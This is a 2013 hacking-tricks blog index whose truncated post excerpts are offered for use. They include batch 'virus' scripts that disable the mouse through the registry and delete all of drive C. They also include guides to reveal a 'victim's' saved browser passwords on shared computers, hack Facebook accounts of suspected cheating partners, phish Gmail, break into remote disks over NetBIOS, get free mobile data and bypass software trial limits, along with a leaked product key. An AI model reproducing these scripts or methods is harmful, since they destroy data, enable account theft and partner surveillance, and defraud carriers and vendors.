Friday, 15 February 2013
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press...
New Advance Operating System Designed For Security..!!
Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers.
In the future it might also run Windows apps.
Whonix: Anonymous OS
Whonix has called TorBOX is an anonymous general purpose operating system based on Virtual Box, Debian GNU/Linux and Tor.
By Whonix design, IP and DNS leaks are impossible. Not even...
Wednesday, 13 February 2013
How to use Trial Version Forever without Expiration
Posted by Anonymous On Wednesday, February 13, 2013 1 comment
Ever wondered that ‘how to install trial version again? or even better than that like ‘how to use a trial version forever?‘ or ‘How to stop trial time?‘
Download any Trial software and use it for unlimited time. You can use any software forever without expiration you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and...
Tuesday, 12 February 2013
How to Hack another computer Hard Disk using Command Prompt - CMD
Posted by Anonymous On Tuesday, February 12, 2013 3 comments
ACCESS OTHER'S COMPUTER HARDDISK COMMAND PROMPT
THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.
STEP-BY-STEP NETBIOS HACKING PROCEDURE
1. Open command prompt (CMD)
2. In the command prompt use the “net view” command
(OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:\>net...
Now a days Facebook becomes the number#1 social networking portal that touches every one’s life. People are now a days looking for hacking of Facebook account to steal someone's’ personal life. 60% people are looking for control over their girlfriends Facebook account ..!!. A lot of people contact me about suspecting their boyfriend/girlfriend of cheating, They ask for a Tutorial for hacking Facebook Account passwords. There are many websites that give guarantee to hack Facebook account and try to sell video that demonstrate hacking of...
Today i am going to teach you how to hack a gmail account.There are many ways to hack a gmail account.Even i searched for the tips and tricks to hack a gmail password.I found lots of ways to hack gmail account.But most of the webmasters cheating the users by selling fake gmail hacking softwares or tools actually there is no use with those gmail hacks.Among all the ways to hack a gmai account , i found Phishing is easy and workable.Its the only gmail hacking trick available to all standards of users.This is the best gmail hacking trick without...
Sunday, 10 February 2013
What is RAT?
As i have told you in my introduction paragraph RAT is Remote Access Trojan. It is a piece of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. There is some RAT that even your antivirus software cannot detect. So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you over the mail or in chat room.
What you can do with RAT?
Once a RAT is installed on any computer...
Saturday, 9 February 2013
Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3...
Friday, 8 February 2013
Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Save this file as virus.bat
Done you just created your virus....
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
...
How to view saved password in Google chrome?
Posted by Anonymous On Friday, February 08, 2013 No comments
1. Open any website where password is saved by user. Here i will demonstrate with facebook but it will work on any website.
2. Right click on password (Dots or asterisks) as shown in below image.
3. Then click on Inspect element.
4. Then change Password to text as shown in below picture.
Before changing it will look like below:
<input type=”password” class=”inputtext” name=”pass” id=”pass” tabindex=”2”>
After changing it will look like below:
<input type=”text” class=”inputtext” name=”pass” id=”pass” tabindex=”2”>
5....
1. Open Firefox Web Browser
2. Then Click on Firefox > Option > Option as shown in below picture
3. Then a POP Up box will appear, in that go to security and click.
4. Now click on website whose password you want to see ans click. (Note: It will ask for confirmation so click on yes when dialog box appears)
5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password.
&nbs...
1. Open VLC Media Player. If you don't have it downloads it from Here
2. Then Go to Tools > Preference or press CTRL + P and Select Video from left panel
3. Then Choose DirectX video output from output dropdown list
4. Save the changes ans restart VLC Media Player.
5. Play any video you would like to set as your desktop wallpaper.
6. Then click on Video and select DirectX Wallpaper from the dropdown list
7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
8. If you want your...
Trace IP address of someone or friends in Facebook chat, Google chat-Gtalk, Messengers on windows: -
Follow my steps:
Step 1: Start -> All Programs -> Accessories -> Command Prompt
or go to start and type cmd in search box.
Now you command Prompt will open.
Step 2: Then start chat with your friend, who you want to find his/her place.
Step 3: Type the command "NETSTAT" in the command prompt.
It will trace the all activities of your network with IP address.
Step 4: Next Step is to trace that user using his/her IP address
To do...
How to Lock Folder without Software Using Batch File
Posted by Anonymous On Friday, February 08, 2013 1 comment
Copy and paste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do.
Then you see a batch file.
Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files, double click the batch file again and you would be prompted for password. Enter the password and access the folder.
if...
Free BSNL Unlimited GPRS Surfing Tricks 2012
Posted by Anonymous On Friday, February 08, 2013 1 comment
Hey buddy, i know that you all are looking for some tricks to get free GPRS services on your mobiles or computers. Here i am telling you about Free BSNL GPRS Surfing Tricks 2012.This trick is very easy to implement. Only few lines of steps have to do. BSNL FREE GPRS Trick Proxy: - 110.100.3.2 Port: - 9209 APN: - wapwest.cellone.in
Homepage: http://allofedition.blogspot.in/
Now Save This Settings.....
BSNL 3G Hack trick to Unlimited Browsing at normal GPRS rate
Posted by Anonymous On Friday, February 08, 2013 1 comment
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of
Normal GPRS
First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be
activated in 24 hours, after activation get gprs settings by calling customer care
Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.
Go to settings>tools>settings>phone&g
t;network>network mode>...
How to trace a mobile number in India.
Trace & Track Indian Mobile Number Location, provider, type and other details by entering the mobile number below.
In India there are many pranks are going on, so to trace out the mobile numbers of a prank calls and the messages we can trace any mobile number.
We only can trace the location and the service provider of the mobile number, as you can find out owner of mobile number by going to the specific service provider and complaint about the prank.
The lists of the websites...
How to install Visual Basic 6.0 for Windows 8 and Windows 7
Posted by Anonymous On Friday, February 08, 2013 2 comments
First of Disabled Windows Defender and Antivirus Protection for your PC.
Than Go to your Visual Basic 6.0 setup directory and Find "Setup.exe" then Right click on Setup.exe and Go to "Compatibility".
Choose "Run this program in compatibility mode for : Windows XP (Service Pack 3)"
And Mark "Run this program as an administrator" and Press Ok
Install "Setup.exe" and Go, Go....
Product key of Visual Basic 6.0 Enterprise Edition
Key : 881-7306462
Any Problem during installation, then comment me and like my Facebook page...